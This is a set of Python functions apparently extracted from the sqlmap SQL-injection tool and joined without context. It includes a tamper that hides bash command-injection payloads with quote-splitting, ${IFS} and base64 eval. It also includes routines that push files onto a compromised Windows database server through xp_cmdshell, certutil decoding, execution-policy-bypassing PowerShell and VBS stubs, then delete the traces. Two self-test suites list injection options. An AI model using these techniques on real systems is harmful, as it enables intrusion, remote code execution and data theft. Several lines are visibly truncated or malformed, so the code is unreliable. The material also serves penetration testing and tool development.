def tamper(payload, **kwargs): """ bash no spaces - not working on bourne shell (sh) """ if"^[A-Za-z0-9]", payload) == None: prefix = payload[:1] + "e'v'al${IFS}`e'c'ho${IFS}'" payloadb64 = encodeBase64(payload[1:], binary=False) suffix = "'|ba's'e64${IFS}-d`" else: prefix = "e'v'al${IFS}`e'c'ho${IFS}'" payloadb64 = encodeBase64(payload, binary=False) suffix = "'|ba's'e64${IFS}-d`" return (prefix + payloadb64 + suffix) if payload else payload
def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): infoMsg = "using certutil.exe to write the %s " % fileType infoMsg += "file content to file '%s', please wait.." % remoteFile chunkMaxSize = 500 randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\\%s" % (tmpPath, randFile) encodedFileContent = encodeBase64(localFileContent, binary=False) splittedEncodedFileContent = '\n'.join([ encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize) ]) logger.debug( "uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) logger.debug("decoding the file to %s.." % remoteFile) commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, remoteFile), "del /F /Q %s" % randFile) self.execCmd(" & ".join(command for command in commands))
def download(taskid, target, filename): """ Download a certain file from the file system """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to download()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) path = os.path.abspath( os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) # Prevent file path traversal if not path.startswith(paths.SQLMAP_OUTPUT_PATH): logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) return jsonize({"success": False, "message": "Forbidden path"}) if os.path.isfile(path): logger.debug("(%s) Retrieved content of file %s" % (taskid, target)) content = openFile(path, "rb").read() return jsonize({ "success": True, "file": encodeBase64(content, binary=False) }) else: logger.warning("[%s] File does not exist %s" % (taskid, target)) return jsonize({"success": False, "message": "File does not exist"})
def fileContentEncode(self, content, encoding, single, chunkSize=256): retVal = [] if encoding == "hex": content = encodeHex(content) elif encoding == "base64": content = encodeBase64(content) else: content = codecs.encode(content, encoding) content = getText(content).replace("\n", "") if not single: if len(content) > chunkSize: for i in xrange(0, len(content), chunkSize): _ = content[i:i + chunkSize] if encoding == "hex": _ = "0x%s" % _ elif encoding == "base64": _ = "'%s'" % _ retVal.append(_) if not retVal: if encoding == "hex": content = "0x%s" % content elif encoding == "base64": content = "'%s'" % content retVal = [content] return retVal
def tamper(payload, **kwargs): #original cookie cookie_data = '{"last_book":"Mg==","userchl2":""}' x = encodeBase64(payload, binary=False) tmp = cookie_data.replace("Mg==", x) return urllib.parse.quote(tmp)
def tamper(payload, **kwargs): """ Base64-encodes all characters in a given payload >>> tamper("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' """ return encodeBase64(payload, binary=False) if payload else payload
def _client(url, options=None): logger.debug("Calling '%s'" % url) try: data = None if options is not None: data = jsonize(options) headers = {"Content-Type": "application/json"} if DataStore.username or DataStore.password: headers["Authorization"] = "Basic %s" % encodeBase64("%s:%s" % (DataStore.username or "", DataStore.password or ""), binary=False) req = _urllib.request.Request(url, data, headers) response = _urllib.request.urlopen(req) text = except: if options: logger.error("Failed to load and parse %s" % url) raise return text
def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType): infoMsg = "using PowerShell to write the %s file content " % fileType infoMsg += "to file '%s'" % remoteFile encodedFileContent = encodeBase64(localFileContent, binary=False) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) localFileSize = len(encodedFileContent) chunkMaxSize = 1024 logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) for i in xrange(0, localFileSize, chunkMaxSize): wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " psString += "[System.Convert]::FromBase64String($Base64); Set-Content " psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) logger.debug( "executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile) commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, "del /F /Q \"%s\"" % encodedBase64FilePath, "del /F /Q \"%s\"" % randPSScriptPath) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType): infoMsg = "using a custom visual basic script to write the " infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\\%s" % (tmpPath, randFile) vbs = """Dim inputFilePath, outputFilePath inputFilePath = "%s" outputFilePath = "%s" Set fs = CreateObject("Scripting.FileSystemObject") Set file = fs.GetFile(inputFilePath) If file.Size Then Wscript.Echo "Loading from: " & inputFilePath Wscript.Echo Set fd = fs.OpenTextFile(inputFilePath, 1) data = fd.ReadAll fd.Close data = Replace(data, " ", "") data = Replace(data, vbCr, "") data = Replace(data, vbLf, "") Wscript.Echo "Fixed Input: " Wscript.Echo data Wscript.Echo decodedData = base64_decode(data) Wscript.Echo "Output: " Wscript.Echo decodedData Wscript.Echo Wscript.Echo "Writing output in: " & outputFilePath Wscript.Echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) ofs.Write decodedData ofs.close Else Wscript.Echo "The file is empty." End If Function base64_decode(byVal strIn) Dim w1, w2, w3, w4, n, strOut For n = 1 To Len(strIn) Step 4 w1 = mimedecode(Mid(strIn, n, 1)) w2 = mimedecode(Mid(strIn, n + 1, 1)) w3 = mimedecode(Mid(strIn, n + 2, 1)) w4 = mimedecode(Mid(strIn, n + 3, 1)) If Not w2 Then _ strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) If Not w3 Then _ strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) If Not w4 Then _ strOut = strOut + Chr(((w3 * 64 + w4) And 255)) Next base64_decode = strOut End Function Function mimedecode(byVal strIn) Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" If Len(strIn) = 0 Then mimedecode = -1 : Exit Function Else mimedecode = InStr(Base64Chars, strIn) - 1 End If End Function""" % (randFilePath, remoteFile) vbs = vbs.replace(" ", "") encodedFileContent = encodeBase64(localFileContent, binary=False) logger.debug( "uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) logger.debug( "uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, "del /F /Q %s" % randVbs, "del /F /Q %s" % randFile) self.execCmd(" & ".join(command for command in commands))
def vulnTest(): """ Runs the testing against 'vulnserver' """ TESTS = ( (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'",)), (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape", (u": '\u0161u\u0107uraj'",)), ("--list-tampers", ("between", "MySQL", "xforwardedfor")), ("-r <request> --flush-session -v 5", ("CloudFlare", "possible DBMS: 'SQLite'", "User-agent: foobar")), ("-l <log> --flush-session --keep-alive --skip-waf -v 5 --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")), ("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), ("-u <url> --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), ("-u <url> --flush-session --data='{\"id\": 1}' --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <url> --flush-session -H 'Foo: Bar' -H 'Sna: Fu' --data='<root><param name=\"id\" value=\"1*\"/></root>' --union-char=1 --mobile --answers='smartphone=3' --banner --smart -v 5", ("might be injectable", "Payload: <root><param name=\"id\" value=\"1", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.", "Nexus", "Sna: Fu", "Foo: Bar")), ("-u <url> --flush-session --method=PUT --data='a=1&b=2&c=3&id=1' --skip-static --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "2 entries")), ("-u <url> --flush-session -H 'id: 1*' --tables", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --banner --invalid-logical --technique=B --predict-output --test-filter='OR boolean' --tamper=space2dash", ("banner: '3.", " LIKE ")), ("-u <url> --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner", ("NULL connection is supported with HEAD method", "banner: '3.")), ("-u <url> --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --answer=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary")), ("-u <url> --flush-session --all", ("5 entries", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")), ("-u '<url>&echo=foobar*' --flush-session", ("might be vulnerable to cross-site scripting",)), ("-u '<url>&query=*' --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d <direct> --flush-session --dump -T users --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)",)), ("-d <direct> --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "[*] 987654321",)), ) retVal = True count = 0 address, port = "", random.randint(1025, 65535) def _thread(): vulnserver.init(quiet=True), port=port) thread = threading.Thread(target=_thread) thread.daemon = True thread.start() while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((address, port)) break except: time.sleep(1) handle, database = tempfile.mkstemp(suffix=".sqlite") os.close(handle) with sqlite3.connect(database) as conn: c = conn.cursor() c.executescript(vulnserver.SCHEMA) handle, request = tempfile.mkstemp(suffix=".req") os.close(handle) handle, log = tempfile.mkstemp(suffix=".log") os.close(handle) content = "POST / HTTP/1.0\nUser-agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port) open(request, "w+").write(content) open(log, "w+").write('<port>%d</port><request base64="true"><![CDATA[%s]]></request>' % (port, encodeBase64(content, binary=False))) url = "http://%s:%d/?id=1" % (address, port) direct = "sqlite3://%s" % database for options, checks in TESTS: status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) cmd = "%s %s %s --batch" % (sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "")), options.replace("<url>", url).replace("<direct>", direct).replace("<request>", request).replace("<log>", log)) output = shellExec(cmd) if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks): dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % clearColors(output)) retVal = False count += 1 clearConsoleLine() if retVal:"vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def vulnTest(): """ Runs the testing against 'vulnserver' """ TESTS = ( ("-h", ("to see full list of options run with '-hh'", )), ("--dependencies --deprecations", ("sqlmap requires", "third-party library", "~DeprecationWarning:")), ("-u <url> --data='reflect=1' --flush-session --wizard", ("Please choose:", "back-end DBMS: SQLite", "current user is DBA: True", "banner: '3.")), ("-u <url> --data='code=1' --code=200 --technique=B --banner --flush-session", ("back-end DBMS: SQLite", "banner: '3.")), (u"-c <config> --flush-session --smart --roles --statements --hostname --privileges --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'", "on SQLite it is not possible")), (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'", )), ("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")), ("-u '<url>&id2=1' -p id2 -v 5 --flush-session --level=5 --text-only --test-filter='AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'", ("~1AND", )), ("--list-tampers", ("between", "MySQL", "xforwardedfor")), ("-r <request> --flush-session -v 5 --test-skip='heavy' --save=<config>", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")), ("-c <config>", ("CloudFlare", "possible DBMS: 'SQLite'", "User-agent: foobar", "~Type: time-based blind")), ("<piped> -r <request> -l <log> --flush-session --banner --technique=B", ("banner: '3.", "STDIN")), ("-l <log> --flush-session --keep-alive --skip-waf -v 5 --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")), ("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), ("-u <base> --flush-session --data='id=1&_=Eewef6oh' --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <base64> -p id --base64=id --data='base64=true' --flush-session --banner --technique=B", ("banner: '3.", )), ("-u <base64> -p id --base64=id --data='base64=true' --flush-session --tables --technique=U", (" users ", )), ("-u <url> --flush-session --banner --technique=B --not-string 'no results'", ("banner: '3.", )), ("-u <url> --flush-session --banner --technique=B --first=1 --last=2", ("banner: '3.'", )), ("-u <url> --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), ("-u <base> --flush-session --data='{\"id\": 1}' --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <base> --flush-session -H 'Foo: Bar' -H 'Sna: Fu' --data='<root><param name=\"id\" value=\"1*\"/></root>' --union-char=1 --mobile --answers='smartphone=3' --banner --smart -v 5", ("might be injectable", "Payload: <root><param name=\"id\" value=\"1", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.", "Nexus", "Sna: Fu", "Foo: Bar")), ("-u <base> --flush-session --method=PUT --data='a=1;id=1;b=2' --param-del=';' --skip-static --har=<tmp> --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "2 entries")), ("-u <url> --flush-session -H 'id: 1*' --tables -t <tmp>", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --banner --invalid-logical --technique=B --predict-output --test-filter='OR boolean' --tamper=space2dash", ("banner: '3.", " LIKE ")), ("-u <url> --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner", ("NULL connection is supported with HEAD method", "banner: '3.")), ("-u <url> --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")), ("-u <url> --flush-session --all", ("5 entries", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")), ("-u '<url>&echo=foobar*' --flush-session", ("might be vulnerable to cross-site scripting", )), ("-u '<url>&query=*' --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d <direct> --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)", "dumped to SQLITE database")), ("-d <direct> --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ( "banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "[*] 987654321", )), ("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")), ) retVal = True count = 0 address, port = "", random.randint(1025, 65535) def _thread(): vulnserver.init(quiet=True), port=port) thread = threading.Thread(target=_thread) thread.daemon = True thread.start() while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((address, port)) s.send(b"GET / HTTP/1.0\r\n\r\n") if b"vulnserver" in s.recv(4096): break except: time.sleep(1) finally: s.close() handle, config = tempfile.mkstemp(suffix=".conf") os.close(handle) handle, database = tempfile.mkstemp(suffix=".sqlite") os.close(handle) with sqlite3.connect(database) as conn: c = conn.cursor() c.executescript(vulnserver.SCHEMA) handle, request = tempfile.mkstemp(suffix=".req") os.close(handle) handle, log = tempfile.mkstemp(suffix=".log") os.close(handle) content = "POST / HTTP/1.0\nUser-agent: foobar\nHost: %s:%s\n\nid=1\n" % ( address, port) open(request, "w+").write(content) open(log, "w+").write( '<port>%d</port><request base64="true"><![CDATA[%s]]></request>' % (port, encodeBase64(content, binary=False))) base = "http://%s:%d/" % (address, port) url = "%s?id=1" % base direct = "sqlite3://%s" % database content = open( os.path.abspath( os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))).read().replace( "url =", "url = %s" % url) open(config, "w+").write(content) for options, checks in TESTS: status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) for tag, value in (("<url>", url), ("<base>", base), ("<direct>", direct), ("<request>", request), ("<log>", log), ("<config>", config), ("<base64>", url.replace("id=1", "id=MZ=%3d"))): options = options.replace(tag, value) cmd = "%s \"%s\" %s --batch --non-interactive --debug" % ( sys.executable, os.path.abspath( os.path.join(os.path.dirname(__file__), "..", "..", "")), options) if "<tmp>" in cmd: handle, tmp = tempfile.mkstemp() os.close(handle) cmd = cmd.replace("<tmp>", tmp) if "<piped>" in cmd: cmd = re.sub(r"<piped>\s*", "", cmd) cmd = "echo %s | %s" % (url, cmd) output = shellExec(cmd) if not all( (check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output: dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % output, coloring=False) retVal = False count += 1 clearConsoleLine() if retVal:"vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal